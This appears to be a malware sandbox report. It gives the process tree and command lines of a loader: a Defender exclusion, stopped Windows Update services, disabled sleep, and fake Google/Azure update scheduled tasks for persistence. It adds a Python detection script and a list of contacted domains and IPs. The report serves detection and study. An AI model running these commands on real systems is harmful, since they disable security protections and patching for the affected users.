C:\Users\Admin\AppData\Local\Temp\61EA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8C1A.dll

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\8C1A.dll

C:\Users\Admin\AppData\Local\Temp\996B.exe

C:\Users\Admin\AppData\Local\Temp\996B.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Users\Admin\AppData\Local\Temp\9D73.exe

C:\Users\Admin\AppData\Local\Temp\9D73.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\C698.exe

C:\Users\Admin\AppData\Local\Temp\C698.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3328 -ip 3328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 816

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\evuvcij

C:\Users\Admin\AppData\Roaming\evuvcij

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\a8e00b3b-feb7-4dae-ba08-83e179d90546" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4572 -ip 4572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4356 -ip 4356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1124

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

"C:\Users\Admin\AppData\Local\Temp\64AA.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

"C:\Users\Admin\AppData\Local\Temp\6E21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

"C:\Users\Admin\AppData\Local\Temp\5AE3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\78EF.exe

"C:\Users\Admin\AppData\Local\Temp\78EF.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

"C:\Users\Admin\AppData\Local\Temp\B949.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8F29.exe

"C:\Users\Admin\AppData\Local\Temp\8F29.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1120

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

"C:\Users\Admin\AppData\Local\Temp\3302.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\78EF.exe

"C:\Users\Admin\AppData\Local\Temp\78EF.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\6E21.exe

"C:\Users\Admin\AppData\Local\Temp\6E21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

"C:\Users\Admin\AppData\Local\Temp\5AE3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\64AA.exe

"C:\Users\Admin\AppData\Local\Temp\64AA.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\B949.exe

"C:\Users\Admin\AppData\Local\Temp\B949.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe"

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe"

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe"

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe"

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Users\Admin\AppData\Local\Temp\8F29.exe

"C:\Users\Admin\AppData\Local\Temp\8F29.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe"

C:\Users\Admin\AppData\Local\Temp\3302.exe

"C:\Users\Admin\AppData\Local\Temp\3302.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe"

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build3.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5040 -ip 5040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1964

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3716 -ip 3716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2248 -ip 2248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 744 -ip 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3620 -ip 3620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 1732

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4620 -ip 4620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4500 -ip 4500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1732

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
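The command lines above are the loader's tampering sequence: a Defender exclusion for the whole user profile and Program Files, a stop of the Windows Update and BITS services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), powercfg calls that disable standby and hibernation so the host stays up, and a SYSTEM-level scheduled task named after Google Update that runs an updater.exe from a Chrome folder rather than from the real Google Update directory. The following detection logic is an added example written for this report, not sandbox output. The sample events are the command lines copied from the list above; the rule names, and the assumption that the genuine Google updater lives under a Google\Update directory, are the author's.

```python
"""Flag the defence-evasion and impact techniques visible in the command
lines above.  Rules are illustrative; tune them before production use."""
import re
from collections import defaultdict

# Constructed sample: command lines copied from the process list in this report.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc",
    r"sc stop UsoSvc",
    r"C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 1732",
    r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    r"powercfg /x -standby-timeout-dc 0",
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }""",
    r"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe",
]

# Services whose stop disables patching / update delivery.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Assumption: the genuine Google updater is installed under ...\Google\Update\.
LEGIT_GOOGLE_UPDATER_DIR = r"google\update"


def detect(cmdline):
    """Return the set of rule names that match one process command line."""
    tags = set()
    low = cmdline.lower()
    if "add-mppreference" in low and "-exclusionpath" in low:
        tags.add("defender_exclusion_added")
    stopped = {m.group(1) for m in re.finditer(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", low)}
    if stopped & UPDATE_SERVICES:
        tags.add("update_service_stopped")
    if re.search(r"powercfg\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", low):
        tags.add("sleep_disabled")
    task = re.search(r"(?:/tn\s+|-taskname\s+)'?([^'\s]+)", low)
    runs_as_system = re.search(r"(?:/ru|-user)\s+'?system\b", low) is not None
    if task and runs_as_system:
        tags.add("system_scheduled_task")
        exe = re.search(r"(?:/tr\s+|-execute\s+)'+([^']+)'+", low)
        # Google-looking task name whose binary is outside the real updater dir.
        if "googleupdatetaskmachine" in task.group(1) and exe \
                and LEGIT_GOOGLE_UPDATER_DIR not in exe.group(1):
            tags.add("google_update_masquerade")
    # A block comment as the first token does nothing except vary the command line.
    if re.match(r"\S*powershell(?:\.exe)?\s+<#", low):
        tags.add("powershell_comment_prefix")
    return tags


def triage(cmdlines):
    """Map each rule name to the indices of the events that triggered it."""
    hits = defaultdict(list)
    for i, c in enumerate(cmdlines):
        for t in detect(c):
            hits[t].append(i)
    return dict(hits)


if __name__ == "__main__":
    for tag, idx in sorted(triage(SAMPLE_CMDLINES).items()):
        print(f"{tag:28s} events {idx}")
```

The WerFault.exe invocations and the bare yiueea.exe launch produce no hits; the rules fire on the exclusion, the five service stops (once for the cmd.exe wrapper and once for each sc.exe child, so expect one alert per child in real telemetry), the powercfg changes, and the scheduled-task line, which also trips the masquerade check because updater.exe is not under a Google\Update directory.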

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 potunulit.org udp
US 188.114.97.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 37.203.224.190.in-addr.arpa udp
US 8.8.8.8:53 carrieremaken.com udp
US 181.214.31.34:443 carrieremaken.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 34.31.214.181.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
US 8.8.8.8:53 207.25.214.95.in-addr.arpa udp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
MD 176.123.9.142:14845 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 greenbi.net udp
EG 156.219.106.179:80 greenbi.net tcp
US 8.8.8.8:53 179.106.219.156.in-addr.arpa udp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
